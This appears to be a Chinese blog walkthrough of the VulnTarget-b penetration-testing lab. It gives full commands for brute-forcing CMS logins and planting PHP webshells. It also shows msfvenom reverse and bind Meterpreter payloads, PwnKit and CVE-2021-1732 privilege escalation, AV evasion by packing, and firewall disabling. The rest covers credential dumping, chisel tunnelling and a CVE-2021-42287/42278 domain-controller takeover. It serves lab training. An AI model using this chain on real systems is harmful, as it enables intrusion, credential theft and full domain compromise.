VulnTarget-b

实验目标:拿下域控中的flag.txt
学习目标:极致CMS相关漏洞/禅道CMS相关漏洞/隧道代理/免杀/CVE-2021-1732/CVE-2021-42287/CVE-2021-42278
靶机下载:其中vulntarget-b为本次实验机器

百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p

》》》靶机信息《《《

#攻击机
OS:Kali 2022.2
外NIC:192.168.x.x   (桥接模式)(与Centos-7主机进行通信)

#Web Server
OS:Centos 7
Server:极致CMS/宝塔
username:root/vulntarget
password:root
外NIC:192.168.x.x     (桥接模式)(与Kali通信)
内NIC:10.0.20.30 (仅主机模式)(与内网Win10主机即域成员进行通信)

#域成员-Win10
OS:Windows 10
Server:禅道CMS/火绒
本地账户:
win10:win10#123
administrator:admin@123
域成员:
vulntarget\win101:admin#123
Web后台:
admin:Admin123
内NIC:10.0.20.66     (仅主机模式)(与Centos 7即WEB主机进行通信)
内NIC:10.0.10.99    (仅主机模式)(与Win2016即域控通信)

#域控-Wins16
OS:Windows Server 2016
Server:AD DC
username:vulntarget\administrator	
password:Admin@123
内网NIC:10.0.10.100    (仅主机模式)(与Win2016即域内成员通信)(能够Ping通Win2016主机)

一:边界主机

步骤一:在边界主机中登录并修改网卡配置文件ifcfg-ens33将其中IP地址信息改为与桥网络同一网段的IP地址

#编辑配置文件
vi /etc/sysconfig/network-scripts/ifcfg-ens33
#修改内容信息(能够与攻击机相互通信)
IPADDR=192.168.50.106          //修改
NETMASK=255.255.255.0      //修改
GATEWAY=192.168.50.1        //修改

0x00:信息收集

步骤二:使用Nmap对目标主机进行扫描…发现开放:21/22/80/81/888/3306/8888等端口…

nmap -sT -Pn 192.168.50.106

image.png
步骤三:访问后发现80为宝塔默认页面/81为极致CMS站点/8888为宝塔登录入口…下一步从极致CMS站点入手…
image.png
image.png
步骤四:使用Dirb扫描目标敏感目录…发现后台登录与版本信息…

#扫描命令
dirb http://192.168.50.106:81/
#扫描信息
http://192.168.50.106:81/admin.php/Login/index.html   //后台登录
http://192.168.50.106:81/readme.txt                   //版本信息
http://192.168.50.106:81/robots.txt                   //敏感目录

image.png
image.png

0x01:漏洞利用

步骤五:根据以上扫描收集到的信息搜索该极致CMS Beta1.8.1的漏洞发现存在后台GetShell…尝试使用BP进行爆破,测试验证存在验证码复用且爆破结果为默认用户密码admin:admin123进行登录,成功…
image.png
image.png
步骤六:开始后台GetShell,点击扩展管理–>插件列表–>找到在线编辑模板–>下载–>安装–>配置–>输入账户密码–>点击立即提交–>跳转到在线文件管理工具–>登录即可
image.png
image.png
image.png
步骤七:在在线文件管理器中新建文件并写入一句话木马,测试访问并用蚁剑链接…
image.png
image.png
image.png

0x02:绕过disable_functions

步骤八:在Shell中执行命令时返回ret=127可能是宝塔禁用了命令执行的函数,这里使用蚁剑的插件进行绕过执行命令…测试发现还是有些命令执行不了…
image.png
image.png
image.png
步骤九:进行简要的信息收集…发现存在通往内网的网卡且当前权限为低权限需要提全…

#收集命令
id
whoami
uname -a
/sbin/ifconfig
cat /etc/passwd
#收集信息
低权限用户:www
可用用户:root/vulntarget
网卡信息:192.168.50.106/10.0.20.30

步骤十:使用MSF生成后门并上传到蚁剑中执行,进行反弹Shell…

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.50.46 LPORT=1234 -f elf -o outside.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.50.46
set lport 1234
show options
run

image.png

0x03:权限提升

步骤十一:使用以下模块查找可提权的漏洞…这里直接使用cve_2021_4034_pwnkit_lpe_pkexec进行提权限

run post/multi/recon/local_exploit_suggester

image.png
步骤十二:执行以下命令来进行提权…即可获取到最高权限root

#执行命令
bg
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
run
#注意事项
1.在云主机上的MSF一定要设置好Payload,且其中的LHOST为外网地址才能正常返回高权限的Shell

image.png
步骤十四:进入到Shell中获取到Flag…

vulntarget{get-one-centos-privilage-promotion}

image.png

二:域内主机

0x00:内网信息收集

步骤一:在MSF中查看路由信息并添加路由…

run post/multi/manage/autoroute  #添加路由
run autoroute -p    #查看路由

image.png
步骤二:使用MSF的PortScan模块对内网进行主机存活及端口开放扫描…发现内网10.0.20.66开放8080端口

use auxiliary/scanner/portscan/tcp
set rhost 10.0.20.0/24
set ports 21,22,80,135,139,445,8080
set threads 30
run

image.png
步骤三:上传fscan到蚁剑并执行以下命令,发现10.0.20.66主机为存活且开放3306/8080端口…

#项目地址
https://github.com/shadow1ng/fscan
#执行命令
./fscan_amd64 -h 10.0.20.0/24 -np   #-np   禁ping扫描

image.png
步骤四:这里使用chisel进行流量代理的搭建…这里搭建反向流量代理…使用浏览器测试访问内网站点…

#项目地址
https://github.com/jpillora/chisel
#Kali执行命令
./chisel server -p 50050 --reverse
#边界主机执行命令
./chisel client 192.168.50.46:50050 R:socks
#代理配置
127.0.0.1 1080 socks5

image.png
image.png

0x01:内网Web攻击

步骤五:访问以下地址可获取该CMS的版本…在网络上搜索该禅道CMS系统的漏洞,发现存在CNVD-C-2020-121325漏洞,直接复现!!!

http://10.0.20.66:8080/index.php?mode=getconfig

image.png
步骤六:先尝试弱口令登录,尝试几次后处罚防护机制故取出使用BP爆破的思路,尝试在边界主机上爆破的账号密码admin:Admin123即可登录成功…image.png
image.png
步骤七:在边界主机上写入一句话木马并开启HTTP服务器对内网主机提供下载…并将提供出来一句话木马下载地址进行base64编码…

#将木马写入到第一层的centos机器中
echo "<?php @eval(\$_POST['cmd']); ?> " >1.php    #$前加一个反斜杠转义
#开启python的http服务
python -c 'import pty; pty.spawn("/bin/bash")'  //交互式
python -m SimpleHTTPServer 4567
python -m SimpleHTTPServer 7089
#base64编码
HTTP://10.0.20.33:4567/1.php
SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==

image.png
image.png
步骤八:进行GetShell,将以上步骤得到base64编码值放到link参数后面下载后门文件,访问特定地址即可获取到Shell地址…蚁剑链接访问…

#漏洞利用
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==
#Shell地址
http://10.0.20.66:8080/data/client/1/1.php

image.png
image.png
步骤九:执行以下命令进行信息收集…

#whoami /priv
iis apppool\zentao

#system
OS:Windows 10 18363 专业版

#ipconfig
NIC1:10.0.20.66
NIC2:10.0.10.99

#systeminfo
#net time /domain
域:vulntarget.com
域控IP:10.0.10.100

#tasklist /svc
火绒/windows defender

#查看防火墙状态
netsh advfirewall show allprofile state   
#关闭防火墙
netsh advfirewall set  allprofile state off

步骤十:通过以上信息判断为低权限且为域内主机,在MSF上生成正向链接木马加壳并在蚁剑运行上线…

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=6061 -f exe > inside.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6061
set Rhost 10.0.20.66
run

加壳免杀:http://www.ucbug.com/soft/33605.html
image.png

0x02:内网Web提权

步骤十一:在MSF中使用以下模块搜索漏洞利用模块进行提权…未果在公网上搜索相关提权漏洞…

meterpreter > run post/multi/recon/local_exploit_suggester

image.png
步骤十二:在公网找到CVE-2021-1732针对于Windows 10的提权漏洞…Github上寻找并在下载放置到蚁剑中执行测试…这里同样需要加壳绕过火绒…

#提权项目
源项目地址:https://github.com/shanfenglan/test/blob/master/cve-2021-1732.exe
备份地址:https://github.com/sukusec301/test/blob/master/cve-2021-1732.exe
#使用方式
cve-2021-1732.exe whoami

image.png
步骤十三:使用MSF生成正向连接马并加壳,开启MSF监听并执行以下命令就能上线System权限的Shell…

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=6062 -f exe > i2side.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6062
set rhost 10.0.20.66
run
cve-2021-1732_se.exe i2side_se.exe

image.png
步骤十四:尝试抓取密码…只抓取到了域成员是win101账户的NTLM Hash解密得到密码admin#123;添加路由信息…

#抓取密码
load kiwi
cerds_all
kiwi_cmd sekurlsa::logonpasswords
#添加路由
run post/multi/manage/autoroute  //添加路由
run autoroute -p                 //查看路由

image.png
image.png
image.png

三:域控服务

0x00:域内信息收集

步骤一:使用scaninfo扫描内部存活主机…发现存活主机10.0.10.100且扫描出主机账号密码信息…

#项目地址
https://github.com/redtoolskobe/scaninfo
#使用方法
scaninfo_windows_x64.exe -i 10.0.10.0/24

image.png
步骤二:也可使用MSF的Portscan模块对目标进行端口扫描…

use auxiliary/scanner/portscan/tcp
set rhost 10.0.10.100
set ports 21,22,80,135,139,445,8080
set threads 30
run

image.png
步骤三:使用最近的CVE-2021-42287/CVE-2021-42278漏洞来获取域控权限…配置代理与proxychains信息

#代理配置
use auxiliary/server/socks_proxy   
show options   
run
jobs
#proxychains配置
vi /etc/proxychains4.conf
socks5 127.0.0.1 1081
#链接测试
proxychains nmap -Pn -p 110 -sT 10.0.10.110

image.png

0x01:域控服务攻击

步骤四:编辑本地Host文件修改域名信息并下载漏洞攻击项目到本地…使用Python脚本并按照以下格式攻击即可获取到域控的Shell…

#vi /etc/hosts
10.0.10.100 vulntarget.com
#漏洞项目下载
https://github.com/WazeHell/sam-the-admin
#漏洞攻击使用
proxychains python3 sam_the_admin.py "域名/域用户:用户密码" -dc-ip 域控IP -shell
proxychains python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

image.png
image.png
步骤五:进入到域控管理员的家目录发现flag.txt…查看内容为如下

再次恭喜拿下域控 +_+

打印机漏洞,CVE-2021-42287/CVE-2021-42278 域内提权 GET

vulntarget{domain-continue}

参考链接:

https://blog.csdn.net/zhangge3663/article/details/116430637/
https://blog.csdn.net/qq_36197704/article/details/109385695
https://blog.csdn.net/kelenwait/article/details/117676942
https://cloud.tencent.com/developer/article/1928565
https://cloud.tencent.com/developer/article/1926625
https://zhuanlan.zhihu.com/p/360149991
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值